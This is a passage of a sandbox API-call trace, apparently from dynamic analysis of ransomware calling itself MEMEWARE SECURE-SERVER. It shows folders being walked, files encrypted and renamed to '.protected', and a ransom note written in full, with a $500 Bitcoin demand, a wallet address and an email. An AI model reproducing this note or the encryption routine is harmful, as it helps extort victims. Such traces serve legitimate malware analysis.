lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0073.861] lstrlenA (lpString="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") returned 684 [0073.861] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0073.861] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.861] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0073.861] CloseHandle (hObject=0xb4) returned 1 [0073.861] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0073.861] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0073.862] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RESTORE_FILES.txt") returned 100 [0073.862] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0073.862] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.862] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0073.863] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.863] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0073.863] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.863] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0073.863] CloseHandle (hObject=0xa4) returned 1 [0073.863] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0073.864] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="Windows") returned -1 [0073.864] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="Program Files") returned -1 [0073.864] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="Program Files (x86)") returned -1 [0073.864] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", 
lpString2="$Recycle.bin") returned 1 [0073.864] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="System Volume Information") returned -1 [0073.864] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 71 [0073.864] lstrcmpW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2=".") returned 1 [0073.864] lstrcmpW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="..") returned 1 [0073.864] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*") returned 73 [0073.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0073.865] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.865] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.865] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.865] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.865] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.865] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\.") returned 73 [0073.865] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.865] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.865] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.865] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.865] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.865] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 
[0073.865] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.865] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\..") returned 74 [0073.865] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.865] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.865] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.865] lstrcmpiW (lpString1="state.rsm", lpString2="Windows") returned -1 [0073.865] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files") returned 1 [0073.865] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files (x86)") returned 1 [0073.865] lstrcmpiW (lpString1="state.rsm", lpString2="$Recycle.bin") returned 1 [0073.866] lstrcmpiW (lpString1="state.rsm", lpString2="System Volume Information") returned -1 [0073.866] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 81 [0073.866] StrStrIW (lpFirst="state.rsm", lpSrch=".protected") returned 0x0 [0073.866] lstrcmpW (lpString1="state.rsm", lpString2="RESTORE_FILES.txt") returned 1 [0073.866] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0073.866] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0073.866] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xb4 [0073.866] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 81 [0073.866] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0073.866] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 81 [0073.866] StrStrW (lpFirst="state.rsm", lpSrch=".rar") returned 0x0 [0073.866] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 81 [0073.866] StrStrW (lpFirst="state.rsm", lpSrch=".zip") returned 0x0 [0073.866] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x29a, lpOverlapped=0x0) returned 1 [0073.868] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffd66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.868] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x29a, lpOverlapped=0x0) returned 1 [0073.868] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.868] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0073.868] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0073.868] CloseHandle (hObject=0xb4) returned 1 [0073.868] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.protected") returned 91 [0073.868] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.protected" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.protected")) returned 1 [0073.900] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.900] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="Windows") returned -1 [0073.900] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="Program Files") returned 1 [0073.901] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="Program Files (x86)") returned 1 [0073.901] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="$Recycle.bin") returned 1 [0073.901] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="System Volume Information") returned 1 [0073.901] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 88 [0073.901] StrStrIW (lpFirst="vcredist_x64.exe", lpSrch=".protected") returned 0x0 [0073.901] lstrcmpW (lpString1="vcredist_x64.exe", lpString2="RESTORE_FILES.txt") returned 1 [0073.901] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0073.901] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0073.901] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" 
(normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.901] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 88 [0073.901] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".txt") returned 0x0 [0073.901] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 88 [0073.901] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".rar") returned 0x0 [0073.901] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 88 [0073.901] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".zip") returned 0x0 [0073.901] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0073.995] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.995] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0073.996] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.996] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0074.002] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0074.002] CloseHandle (hObject=0xb4) returned 1 [0074.002] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.protected") returned 98 [0074.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.protected" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.protected")) returned 1 [0074.003] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0074.003] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0074.003] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\RESTORE_FILES.txt") returned 89 [0074.003] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0074.005] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.005] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0074.006] lstrlenA (lpString="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") returned 684 [0074.006] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0074.006] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.006] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0074.006] CloseHandle (hObject=0xa4) returned 1 [0074.006] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0074.006] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="Windows") returned -1 [0074.006] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="Program Files") returned -1 [0074.006] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="Program Files (x86)") returned -1 [0074.007] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="$Recycle.bin") returned 1 [0074.007] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="System Volume Information") returned -1 [0074.007] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned 83 [0074.007] lstrcmpW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2=".") returned 1 [0074.007] lstrcmpW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="..") returned 1 [0074.007] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*") returned 85 [0074.007] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package 
Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0074.007] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.007] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.007] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.008] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.008] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.008] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\.") returned 85 [0074.008] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.008] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.009] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.009] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.009] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.009] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.009] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.009] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\..") returned 86 [0074.009] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.009] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.009] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.009] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0074.009] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0074.009] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 
[0074.009] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0074.009] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0074.009] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned 92 [0074.009] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0074.009] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0074.009] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*") returned 94 [0074.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0074.010] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.010] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.010] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.010] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.010] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.010] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\.") returned 94 [0074.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.010] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.010] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.010] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.010] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.010] lstrcmpiW 
(lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.010] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.010] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\..") returned 95 [0074.010] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.010] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.010] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.010] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Windows") returned -1 [0074.010] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files") returned 1 [0074.010] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files (x86)") returned 1 [0074.010] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="$Recycle.bin") returned 1 [0074.010] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="System Volume Information") returned 1 [0074.010] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 